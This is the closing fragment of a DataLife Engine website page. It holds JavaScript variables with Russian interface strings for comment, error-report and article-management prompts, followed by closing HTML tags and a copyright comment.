var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
